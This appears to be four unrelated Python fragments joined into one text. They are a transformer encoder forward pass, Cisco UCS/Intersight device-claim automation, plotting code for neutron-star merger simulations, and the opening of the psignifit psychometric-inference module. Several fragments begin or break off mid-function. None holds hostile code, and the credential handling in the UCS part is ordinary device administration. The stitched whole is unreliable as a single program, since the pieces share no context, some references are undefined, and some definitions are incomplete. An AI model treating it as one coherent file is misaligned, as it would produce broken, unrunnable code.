for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def forward(self, input_ids, attention_mask=None, head_mask=None, img_feats=None,
encoder_history_states=None, output_attentions=None, output_hidden_states=None, return_dict=None):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
if attention_mask.dim() == 2:
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
elif attention_mask.dim() == 3:
extended_attention_mask = attention_mask.unsqueeze(1)
else:
raise NotImplementedError
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if head_mask is not None:
if head_mask.dim() == 1:
head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
head_mask = head_mask.expand(self.config.num_hidden_layers, -1, -1, -1, -1)
elif head_mask.dim() == 2:
head_mask = head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1) # We can specify head_mask for each layer
# switch to float if needed + fp16 compatibility
head_mask = head_mask.to(dtype=next(self.parameters()).dtype) # switch to fload if need + fp16 compatibility
else:
head_mask = [None] * self.config.num_hidden_layers
embedding_output = self.embeddings(input_ids) # DistilBERT uses self-genearted position_embedding and
# no | |
Obtain Device ID
print("Attempting to obtain the UCS FI Device Connector Device "
"ID...")
get_ucs_fi_device_connector_device_id = _request_ucs_fi_device_connector_device_id(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
if get_ucs_fi_device_connector_device_id.status_code == 200:
ucs_fi_device_connector_device_id_list = get_ucs_fi_device_connector_device_id.json()
ucs_fi_device_connector_device_id = ucs_fi_device_connector_device_id_list[0]["Id"]
print("The Device ID for the Device Connector of "
f"{ucs_fi_device_console_ip} has been retrieved.")
return ucs_fi_device_connector_device_id
else:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Device ID for the Device "
f"Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(get_ucs_fi_device_connector_device_id.json())
else:
print("\nA configuration error has occurred!\n")
print("Unable to login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(ucs_fi_device_console_login.json())
except Exception:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Device ID for the Device Connector "
f"of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
traceback.print_exc()
# Establish function to obtain UCS IMM FI Device Connector Claim Code
def obtain_ucs_fi_device_connector_claim_code(
ucs_fi_device_console_ip,
ucs_fi_device_console_username,
ucs_fi_device_console_password
):
"""This is a function to obtain the Device Connector Claim Code for an
unclaimed UCS Fabric Interconnect under Intersight Managed Mode (IMM).
Args:
ucs_fi_device_console_ip (str):
The IP address of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
ucs_fi_device_console_username (str):
The admin username of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
ucs_fi_device_console_password (str):
The <PASSWORD> of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
Returns:
A string of the Device Connector Claim Code for an unclaimed UCS Fabric
Interconnect.
Raises:
Exception:
An exception occurred due to an issue with accessing the provided
UCS Fabric Interconnect.
"""
try:
# Login to UCS FI Device Console
print("\nAttempting login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}...")
ucs_fi_device_console_login = _request_ucs_fi_device_console_login(
ucs_fi_device_console_ip,
ucs_fi_device_console_username,
ucs_fi_device_console_password
)
if ucs_fi_device_console_login.status_code == 200:
print("Login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip} was successful.\n")
# Obtain Claim Code
print("Attempting to obtain the UCS FI Device Connector Claim "
"Code...")
get_ucs_fi_device_connector_claim_code = _request_ucs_fi_device_connector_claim_code(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
if get_ucs_fi_device_connector_claim_code.status_code == 200:
ucs_fi_device_connector_claim_code_list = get_ucs_fi_device_connector_claim_code.json()
ucs_fi_device_connector_claim_code = ucs_fi_device_connector_claim_code_list[0]["Token"]
print("The Claim Code for the Device Connector of "
f"{ucs_fi_device_console_ip} has been retrieved.")
return ucs_fi_device_connector_claim_code
else:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Claim Code for the Device "
f"Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(get_ucs_fi_device_connector_claim_code.json())
print("A second attempt will be made to obtain Claim "
"Code by refreshing the Device Connector...")
print("Refreshing the Device Connector...")
# Refresh the Device Connector
print("Attempting to refresh the UCS FI Device Connector...")
device_connector_refresh = _request_ucs_fi_device_connector_refresh(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
# Pause to allow Device Connector refresh
time.sleep(5)
if device_connector_refresh.status_code == 200:
# Obtain Claim Code
print("Attempting to obtain the UCS FI Device Connector "
"Claim Code...")
get_ucs_fi_device_connector_claim_code_second_attempt = _request_ucs_fi_device_connector_claim_code(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
if get_ucs_fi_device_connector_claim_code_second_attempt.status_code == 200:
ucs_fi_device_connector_claim_code_list = get_ucs_fi_device_connector_claim_code_second_attempt.json()
ucs_fi_device_connector_claim_code = ucs_fi_device_connector_claim_code_list[0]["Token"]
print("The Claim Code for the Device Connector of "
f"{ucs_fi_device_console_ip} has been "
"retrieved.")
return ucs_fi_device_connector_claim_code
else:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Claim Code for the "
"Device Connector of "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(get_ucs_fi_device_connector_claim_code_second_attempt.json())
else:
print("\nA configuration error has occurred!\n")
print("Unable to refresh the Device Connector for "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(device_connector_refresh.json())
else:
print("\nA configuration error has occurred!\n")
print("Unable to login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(ucs_fi_device_console_login.json())
except Exception:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Claim Code for the Device "
f"Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
traceback.print_exc()
# Establish function to obtain UCS IMM FI Device Connector system information
def obtain_ucs_fi_device_connector_system_info(
ucs_fi_device_console_ip,
ucs_fi_device_console_username,
ucs_fi_device_console_password
):
"""This is a function to obtain the Device Connector system information for
a UCS Fabric Interconnect under Intersight Managed Mode (IMM).
Args:
ucs_fi_device_console_ip (str):
The IP address of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
ucs_fi_device_console_username (str):
The admin username of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
ucs_fi_device_console_password (str):
The admin password of a UCS Fabric Interconnect under Intersight
Managed Mode (IMM).
Returns:
A list of the Device Connector system information for the UCS Fabric
Interconnect.
Raises:
Exception:
An exception occurred due to an issue with accessing the provided
UCS Fabric Interconnect.
"""
try:
# Login to UCS FI Device Console
print("\nAttempting login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}...")
ucs_fi_device_console_login = _request_ucs_fi_device_console_login(
ucs_fi_device_console_ip,
ucs_fi_device_console_username,
ucs_fi_device_console_password
)
if ucs_fi_device_console_login.status_code == 200:
print("Login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip} was successful.\n")
# Obtain system information
print("Attempting to obtain the UCS FI Device Connector system "
"information...")
get_ucs_fi_device_connector_system_info = _request_ucs_fi_device_connector_system_info(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
if get_ucs_fi_device_connector_system_info.status_code == 200:
ucs_fi_device_connector_system_info_list = get_ucs_fi_device_connector_system_info.json()
print("The system information for the Device Connector of "
f"{ucs_fi_device_console_ip} has been retrieved.")
return ucs_fi_device_connector_system_info_list
else:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the system information for the "
f"Device Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(get_ucs_fi_device_connector_system_info.json())
else:
print("\nA configuration error has occurred!\n")
print(f"Unable to login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(ucs_fi_device_console_login.json())
except Exception:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the system information for the Device "
f"Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
traceback.print_exc()
# Establish device claim specific classes and functions
class IntersightDeviceClaim:
"""This class is used to claim a device in Intersight.
"""
object_type = "Intersight Device Claim"
intersight_api_path = "asset/DeviceClaims"
def __init__(self,
intersight_api_key_id,
intersight_api_key,
device_id,
claim_code,
intersight_base_url="https://www.intersight.com/api/v1",
preconfigured_api_client=None
):
self.intersight_api_key_id = intersight_api_key_id
self.intersight_api_key = intersight_api_key
self.device_id = device_id
self.claim_code = claim_code
self.intersight_base_url = intersight_base_url
if preconfigured_api_client is None:
self.api_client = get_api_client(api_key_id=intersight_api_key_id,
api_secret_file=intersight_api_key,
endpoint=intersight_base_url
)
else:
self.api_client = preconfigured_api_client
self.intersight_api_body = {
"SerialNumber": self.device_id,
"SecurityToken": self.claim_code
}
def __repr__(self):
return (
f"{self.__class__.__name__}"
f"('{self.intersight_api_key_id}', "
f"'{self.intersight_api_key}', "
f"'{self.device_id}', "
f"'{self.claim_code}', "
f"'{self.intersight_base_url}', "
f"{self.api_client})"
)
def __str__(self):
return f"{self.__class__.__name__} class object for '{self.device_id}'"
def _post_intersight_object(self):
"""This is a function to configure an Intersight object by
performing a POST through the Intersight API.
Returns:
A string with a statement indicating whether the POST method
was successful or failed.
Raises:
Exception:
An exception occurred while performing the API call.
The status code or error message will be specified.
"""
full_intersight_api_path = f"/{self.intersight_api_path}"
try:
self.api_client.call_api(resource_path=full_intersight_api_path,
method="POST",
body=self.intersight_api_body,
auth_settings=['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2']
)
print(f"The configuration of the {self.object_type} "
"has completed.")
return "The POST method was successful."
except intersight.exceptions.ApiException as error:
if error.status == 409:
existing_intersight_object_name = self.intersight_api_body.get("Name", "object")
print(f"The targeted {self.object_type} appears to already "
"exist.")
print("An attempt will be made to update the pre-existing "
f"{existing_intersight_object_name}...")
try:
existing_intersight_object_moid = intersight_object_moid_retriever(intersight_api_key_id=None,
intersight_api_key=None,
object_name=existing_intersight_object_name,
intersight_api_path=self.intersight_api_path,
object_type=self.object_type,
preconfigured_api_client=self.api_client
)
# Update full Intersight API path with the MOID of the existing object
full_intersight_api_path_with_moid = f"/{self.intersight_api_path}/{existing_intersight_object_moid}"
self.api_client.call_api(resource_path=full_intersight_api_path_with_moid,
method="POST",
body=self.intersight_api_body,
auth_settings=['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2']
)
print(f"The update of the {self.object_type} has "
"completed.")
print(f"The pre-existing {existing_intersight_object_name} "
"has been updated.")
return "The POST method was successful."
except Exception:
print("\nA configuration error has occurred!\n")
print(f"Unable to update the {self.object_type} under the "
"Intersight API resource path "
f"'{full_intersight_api_path_with_moid}'.\n")
print(f"The pre-existing {existing_intersight_object_name} "
"could not be updated.")
print("Exception Message: ")
traceback.print_exc()
return "The POST method failed."
else:
print("\nA configuration error has occurred!\n")
print(f"Unable to configure the {self.object_type} under the "
"Intersight API resource path "
f"'{full_intersight_api_path}'.\n")
print("Exception Message: ")
traceback.print_exc()
return "The POST method failed."
except Exception:
print("\nA configuration error has occurred!\n")
print(f"Unable to configure the {self.object_type} under the "
"Intersight API resource path "
f"'{full_intersight_api_path}'.\n")
print("Exception Message: ")
traceback.print_exc()
return "The POST method failed."
def device_claimer(self):
"""This function claims the targeted device.
"""
print(f"Configuring the {self.object_type} for "
f"{self.device_id}...")
# POST the API body to Intersight
self._post_intersight_object()
def intersight_device_claimer(
intersight_api_key_id,
intersight_api_key,
device_id,
claim_code,
intersight_base_url="https://www.intersight.com/api/v1",
preconfigured_api_client=None
):
"""This is a function used to claim a device on Cisco Intersight.
Args:
intersight_api_key_id (str):
The ID of the Intersight API key.
intersight_api_key (str):
The system file path of the Intersight API key.
device_id (str):
The ID of the device to be claimed.
claim_code (str):
The claim code of the device to be claimed.
intersight_base_url (str):
Optional; The base URL for Intersight API paths. The default value
is "https://www.intersight.com/api/v1". This value typically only
needs to be changed if using the Intersight Virtual Appliance.
preconfigured_api_client | |
'cmap': 'Blues', 'norm': "log",
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
if plot_x_i == 2:
dunb_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$D_{\rm{unb}}$ [GEO]', # 'fmt': '%.1e',
'labelsize': 14,
'fontsize': 14}
if plot_x_i > 1:
dunb_dic_xz['sharey'] = True
dunb_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(dunb_dic_xz)
o_plot.set_plot_dics.append(dunb_dic_xy)
# ----------------------------------------------------------------------
mask = "x<0"
#
v_n = "Ye"
cmap = "bwr_r"
#
data_arr = d3class.get_data(it, rl, "xz", v_n)
x_arr = d3class.get_data(it, rl, "xz", "x")
z_arr = d3class.get_data(it, rl, "xz", "z")
ye_dic_xz = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": z_arr, "zarr": data_arr,
'position': (1, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'fill_vmin': False, # fills the x < vmin with vmin
'v_n_x': 'x', 'v_n_y': 'z', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': zmin, 'ymax': zmax, 'vmin': 0.05, 'vmax': 0.5,
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': cmap, 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},#{"text": r'$t-t_{merg}:$' + r'${:.1f}$ [ms]'.format((t - tmerg) * 1e3), 'fontsize': 14},
'sharey': False,
'sharex': True, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
data_arr = d3class.get_data(it, rl, "xy", v_n)
x_arr = d3class.get_data(it, rl, "xy", "x")
y_arr = d3class.get_data(it, rl, "xy", "y")
ye_dic_xy = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": y_arr, "zarr": data_arr,
'position': (2, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'fill_vmin': False, # fills the x < vmin with vmin
'v_n_x': 'x', 'v_n_y': 'y', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax, 'vmin': 0.01, 'vmax': 0.5,
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': cmap, 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
if plot_x_i == 3:
ye_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$Y_e$', 'fmt': '%.1f',
'labelsize': 14,
'fontsize': 14}
if plot_x_i > 1:
ye_dic_xz['sharey'] = True
ye_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(ye_dic_xz)
o_plot.set_plot_dics.append(ye_dic_xy)
# ----------------------------------------------------------
tcoll = d1class.get_par("tcoll_gw")
if not np.isnan(tcoll) and t >= tcoll:
print(tcoll, t)
v_n = "lapse"
mask = "z>0.15"
data_arr = d3class.get_data(it, rl, "xz", v_n)
x_arr = d3class.get_data(it, rl, "xz", "x")
z_arr = d3class.get_data(it, rl, "xz", "z")
lapse_dic_xz = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": z_arr, "zarr": data_arr,
'position': (1, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'v_n_x': 'x', 'v_n_y': 'z', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': zmin, 'ymax': zmax, 'vmin': 0., 'vmax': 0.15,
'fill_vmin': False, # fills the x < vmin with vmin
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': 'Greys', 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},#,{"text": r'$t-t_{merg}:$' + r'${:.1f}$ [ms]'.format((t - tmerg) * 1e3),
#'fontsize': 14},
'sharey': False,
'sharex': True, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
data_arr = d3class.get_data(it, rl, "xy", v_n)
# print(data_arr.min(), data_arr.max()); exit(1)
x_arr = d3class.get_data(it, rl, "xy", "x")
y_arr = d3class.get_data(it, rl, "xy", "y")
lapse_dic_xy = {'task': 'colormesh', 'ptype': 'cartesian', 'aspect': 1.,
'xarr': x_arr, "yarr": y_arr, "zarr": data_arr,
'position': (2, plot_x_i), # 'title': '[{:.1f} ms]'.format(time_),
'cbar': {},
'v_n_x': 'x', 'v_n_y': 'y', 'v_n': v_n,
'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax, 'vmin': 0, 'vmax': 0.15,
'fill_vmin': False, # fills the x < vmin with vmin
'xscale': None, 'yscale': None,
'mask': mask, 'cmap': 'Greys', 'norm': None,
'fancyticks': True,
'minorticks': True,
'title': {},
'sharey': False,
'sharex': False, # removes angular citkscitks
'fontsize': 14,
'labelsize': 14
}
#
# if plot_x_i == 1:
# rho_dic_xy['cbar'] = {'location': 'bottom -.05 .00', 'label': r'$\rho$ [GEO]', # 'fmt': '%.1e',
# 'labelsize': 14,
# 'fontsize': 14}
if plot_x_i > 1:
lapse_dic_xz['sharey'] = True
lapse_dic_xy['sharey'] = True
o_plot.set_plot_dics.append(lapse_dic_xz)
o_plot.set_plot_dics.append(lapse_dic_xy)
plot_x_i += 1
o_plot.main()
exit(0)
''' density moes '''
def plot_desity_modes():
sims = ["DD2_M13641364_M0_SR", "DD2_M13641364_M0_LK_SR_R04", "DD2_M15091235_M0_LK_SR", "LS220_M14691268_M0_LK_SR"]
lbls = ["DD2" , "DD2 136 136", "DD2 151 124", "LS220 147 127"]
ls_m1 = ["-", "-", '-', '-']
ls_m2 = [":", ":", ":", ":"]
colors = ["black", "green", "blue", "red"]
lws_m1 = [1.,1., 1., 1.]
lws_m2 = [0.8, 0.8, 0.8, 0.8]
alphas = [1., 1., 1., 1.]
#
norm_to_m = 0
#
o_plot = PLOT_MANY_TASKS()
o_plot.gen_set["figdir"] = Paths.plots + "all2/"
o_plot.gen_set["type"] = "cartesian"
o_plot.gen_set["figsize"] = (9.0, 2.7) # <->, |]
o_plot.gen_set["figname"] = "dm_dd2_dd2_ls220.png"
o_plot.gen_set["sharex"] = False
o_plot.gen_set["sharey"] = False
o_plot.set_plot_dics = []
#
#
for sim, lbl, ls1, ls2, color, lw1, lw2, alpha in zip(sims, lbls, ls_m1, ls_m2, colors, lws_m1, lws_m2, alphas):
o_dm = LOAD_DENSITY_MODES(sim)
o_dm.gen_set['fname'] = Paths.ppr_sims+sim+"/"+ "profiles/" + "density_modes_lap15.h5"
o_par = ADD_METHODS_ALL_PAR(sim)
tmerg = o_par.get_par("tmerg")
#
mags1 = o_dm.get_data(1, "int_phi_r")
mags1 = np.abs(mags1)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags1 = mags1 / abs(norm_int_phi_r1d)[0]
times = o_dm.get_grid("times")
#
print(mags1)
#
times = (times - tmerg) * 1e3 # ms
#
densmode_m1 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags1,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls1, 'color': color, 'lw': lw1, 'ds': 'default', 'alpha': alpha,
'label': lbl, 'ylabel': r'$C_m/C_0$ Magnitude', 'xlabel': Labels.labels("t-tmerg"),
'xmin': 45, 'xmax': 110, 'ymin': 1e-5, 'ymax': 1e-1,
'xscale': None, 'yscale': 'log', 'legend': {},
'fancyticks': True, 'minorticks': True,
'fontsize': 14,
'labelsize': 14
}
#
mags2 = o_dm.get_data(2, "int_phi_r")
mags2 = np.abs(mags2)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags2 = mags2 / abs(norm_int_phi_r1d)[0]
# times = (times - tmerg) * 1e3 # ms
# print(mags2); exit(1)
densmode_m2 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags2,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls2, 'color': color, 'lw': lw2, 'ds': 'default', 'alpha': alpha,
'label': None, 'ylabel': r'$C_m/C_0$ Magnitude', 'xlabel': Labels.labels("t-tmerg"),
'xmin': 45, 'xmax': 110, 'ymin': 1e-5, 'ymax': 1e-1,
'xscale': None, 'yscale': 'log',
'fancyticks': True, 'minorticks': True,
'legend': {'loc': 'best', 'ncol': 1, 'fontsize': 12},
'fontsize': 14,
'labelsize': 14
}
#
o_plot.set_plot_dics.append(densmode_m1)
o_plot.set_plot_dics.append(densmode_m2)
#
o_plot.main()
exit(1)
def plot_desity_modes2():
_fpath = "slices/" + "rho_modes.h5" #"profiles/" + "density_modes_lap15.h5"
sims = ["DD2_M13641364_M0_SR", "DD2_M13641364_M0_LK_SR_R04"]
lbls = ["DD2 136 136" , "DD2 136 136 LK"]
ls_m1 = ["-", "-"]
ls_m2 = [":", ":"]
colors = ["green", "orange"]
lws_m1 = [1., 1.,]
lws_m2 = [0.8, 0.8]
alphas = [1., 1.]
#
norm_to_m = 0
#
o_plot = PLOT_MANY_TASKS()
o_plot.gen_set["figdir"] = Paths.plots + "all2/"
o_plot.gen_set["type"] = "cartesian"
o_plot.gen_set["figsize"] = (9.0, 3.6) # <->, |]
o_plot.gen_set["figname"] = "dm_dd2_dd2_ls220.png"
o_plot.gen_set["sharex"] = False
o_plot.gen_set["sharey"] = False
o_plot.gen_set["subplots_adjust_h"] = 0.2
o_plot.gen_set["subplots_adjust_w"] = 0.0
o_plot.set_plot_dics = []
#
#
for sim, lbl, ls1, ls2, color, lw1, lw2, alpha in zip(sims, lbls, ls_m1, ls_m2, colors, lws_m1, lws_m2, alphas):
o_dm = LOAD_DENSITY_MODES(sim)
o_dm.gen_set['fname'] = Paths.ppr_sims+sim+"/"+ _fpath
o_par = ADD_METHODS_ALL_PAR(sim)
tmerg = o_par.get_par("tmerg")
#
mags1 = o_dm.get_data(1, "int_phi_r")
mags1 = np.abs(mags1)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags1 = mags1 / abs(norm_int_phi_r1d)[0]
times = o_dm.get_grid("times")
#
print(mags1)
#
times = (times - tmerg) * 1e3 # ms
#
densmode_m1 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags1,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls1, 'color': 'gray', 'lw': lw1, 'ds': 'default', 'alpha': alpha,
'label': None, 'ylabel':None, 'xlabel': Labels.labels("t-tmerg"),
'xmin': -10, 'xmax': 110, 'ymin': 1e-4, 'ymax': 5e-1,
'xscale': None, 'yscale': 'log', 'legend': {},
'fancyticks': True, 'minorticks': True,
'fontsize': 14,
'labelsize': 14
}
#
mags2 = o_dm.get_data(2, "int_phi_r")
mags2 = np.abs(mags2)
if norm_to_m != None:
# print('Normalizing')
norm_int_phi_r1d = o_dm.get_data(norm_to_m, 'int_phi_r')
# print(norm_int_phi_r1d); exit(1)
mags2 = mags2 / abs(norm_int_phi_r1d)[0]
# times = (times - tmerg) * 1e3 # ms
# print(mags2); exit(1)
densmode_m2 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags2,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls2, 'color': 'gray', 'lw': lw2, 'ds': 'default', 'alpha': alpha,
'label': None, 'ylabel': r'$C_m/C_0$', 'xlabel': Labels.labels("t-tmerg"),
'xmin': 0, 'xmax': 110, 'ymin': 1e-4, 'ymax': 5e-1,
'xscale': None, 'yscale': 'log',
'fancyticks': True, 'minorticks': True,
'legend': {},
'fontsize': 14,
'labelsize': 14,
'title':{'text':"Density Mode Evolution", 'fontsize':14}
# 'sharex': True
}
#
if sim == sims[0]:
densmode_m1['label'] = r"$m=1$"
densmode_m2['label'] = r"$m=2$"
o_plot.set_plot_dics.append(densmode_m1)
o_plot.set_plot_dics.append(densmode_m2)
#
# ---
#
densmode_m1 = {
'task': 'line', 'ptype': 'cartesian',
'xarr': times, 'yarr': mags1,
'position': (1, 1),
'v_n_x': 'times', 'v_n_y': 'int_phi_r abs',
'ls': ls1, | |
#!/usr/bin/env python
# vi: set ft=python sts=4 ts=4 sw=4 et:
######################################################################
#
# See COPYING file distributed along with the psignifit package for
# the copyright and license terms
#
######################################################################
__docformat__ = "restructuredtext"
import sys,os,re
import operator
import numpy as N
import pylab as p
from scipy import stats,special,optimize
import pypsignifit
from pypsignifit import psignipriors
interface = pypsignifit.interface
import swignifit.swignifit_raw as sft
import swignifit.utility as sfu
import pygibbsit
from psignierrors import NosamplesError
__all__ = ["BootstrapInference","BayesInference","ASIRInference"]
__doc__ = """
This module contains data objects to store psychophysical data and perform inference on them. Two general approaches
have been suggested to fit psychometric functions
1. *Constrained maximum likelihood (Wichmann & Hill, 2001a,b)* This procedure starts by fitting a psychometric function
to the data and then performs parametric bootstrap to obtain confidence intervals for parameters, associated
thresholds,... This approach is implemented by the :BootstrapInference: class.
2. *Baysian Inference (Kuss et al., 2005)* This procedure starts with a number of prior distributions for each of
the models parameters and then uses Bayes rule to derive the posterior distribution from the data. As the
posterior distribution can only be determined up to a normalization constant, inference on the posterior distribution
has to be based on samples. These samples are typically obtained using Markoc Chain Monte Carlo (MCMC). This
approach is implemented in the :BayesInference: class.
The module also defines a :PsiInference: base class.
"""
warnred = [.7,0,0]
# Checking keyword arguments
def check_kwargs ( kwargs, docstring ):
"""This function checks that a kwargs dictionary only contains keywords that are documented in the docstring
It returns 0 if everything is ok otherwise, it returns the first nonmatching parameter"""
parametersection = re.search ( r":Parameters:(.*)(:\w+:|$)", docstring, re.DOTALL )
if parametersection is None:
raise ValueError, "Docstring does not contain a parameter section"
parameters = re.findall ( r"\*(\w+)\* :", parametersection.group(1) )
for k in kwargs.keys():
if not k in parameters:
return k
return 0
# Helper function to create properties with one function
def Property(function):
keys = 'fget', 'fset', 'fdel'
func_locals = {'doc':function.__doc__}
def probeFunc(frame, event, arg):
if event == 'return':
locals = frame.f_locals
func_locals.update(dict((k,locals.get(k)) for k in keys))
sys.settrace(None)
return probeFunc
sys.settrace(probeFunc)
function()
return property(**func_locals)
##############################################################################################################################
class PsiInference ( object ):
def __init__ ( self, plotting=None ):
"""This is just a dummy function"""
self.data = None
self.model = {
"sigmoid": "logistic",
"core": "ab",
"priors": None,
"nafc": 2,
"gammaislambda": False
}
self.estimate = None
self.deviance = None
self.devianceresiduals = None
self.Rpd = None
self.Rkd = None
self.__outl = None
self.__infl = None
if plotting is None:
self.__plotting = {}
else:
self.__plotting = plotting
defaults = {"label": "Psychometric function fit","color": "b", "linestyle": "-", "marker": "o", "linewidth": 1 }
for k in defaults.keys():
self.__plotting.setdefault ( k, defaults[k] )
self._data,self._pmf,self.nparams = sfu.make_dataset_and_pmf (
[[1,2,3]], self.model["nafc"], self.model["sigmoid"], self.model["core"], self.model["priors"], gammaislambda=self.model["gammaislambda"] )
def evaluate ( self, x, prm=None ):
"""Evaluate the psychometric function model at positions given by x"""
if prm==None:
prm = self.estimate
if not operator.isSequenceType ( x ):
x = [x]
return N.array ( [self._pmf.evaluate ( xx, prm ) for xx in x] )
def getThres ( self, cut=0.5 ):
"""Get thresholds at cut"""
if self.data == None:
raise NotImplementedError
return float(self._pmf.getThres ( self.estimate, cut ))
def getSlope ( self, cut=0.5 ):
"""Get slope at cut"""
if self.data == None:
raise NotImplementedError
return float ( self._pmf.getSlope ( self.estimate, self.getThres(cut) ))
def __repr__ ( self ):
return "< PsiInference object >"
desc = property ( fget=lambda self: "sigmoid: %(sigmoid)s\ncore: %(core)s\nnAFC: %(nafc)d" % self.model,
doc="A short description of the employed model")
outl = property ( fget=lambda self: self.__outl, doc="A boolean array indicating whether or not a block was an outlier" )
infl = property ( fget=lambda self: self.__infl, doc="A boolean array indicating whether or not a block was an influential observation" )
@Property
def label ():
"Condition label used in plots"
def fget ( self ):
return self.__plotting["label"]
def fset ( self, v ):
self.__plotting["label"] = v
@Property
def color ():
"Color used in plots"
def fget ( self ):
return self.__plotting["color"]
def fset ( self, v ):
self.__plotting["color"] = v
@Property
def linestyle ():
"Linestyle used in plots"
def fget ( self ):
